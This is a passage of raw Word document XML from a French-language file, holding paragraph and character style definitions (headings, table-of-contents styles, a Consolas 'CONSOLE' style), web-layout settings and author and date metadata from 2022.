        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bC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459A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="En-tte"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0018459A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001845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459A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D21EF7"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre1Car">
    <w:name w:val="Titre 1 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FC4774"/>
    <w:rPr>
      <w:rFonts w:ascii="Abadi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Abadi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre2Car">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F16F49"/>
    <w:rPr>
      <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFC000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-ttedetabledesmatires">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titre1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004926C9"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00836552"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="660"/>
        <w:tab w:val="left" w:pos="1100"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004926C9"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F01136"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="440"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00613461"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1320"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0044243B"/>
    <w:rPr>
      <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre4Car">
    <w:name w:val="Titre 4 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002E3872"/>
    <w:rPr>
      <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grilledutableau">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00211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88350E"/>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1E7970"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CONSOLE">
    <w:name w:val="CONSOLE"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CONSOLECar"/>
    <w:qFormat/>
    <w:rsid w:val="001B348C"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CONSOLECar">
    <w:name w:val="CONSOLE Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="CONSOLE"/>
    <w:rsid w:val="001B348C"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="0124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5498">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="411120149">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="440419212">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="496000263">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="693926333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="733116221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1043098996">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1113941902">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1302225019">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1429278016">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1464540010">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1762877054">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1984307890">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="200370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8CCBD-FE92-4B61-89ED-AA8EB7BA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TotalTime>
  <Pages>1</Pages>
  <Words>1315</Words>
  <Characters>7237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Baptiste Guereschi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Baptiste Guereschi</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <cp:lastPrinted>2022-04-22T07:35:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-19T20:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-22T07:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>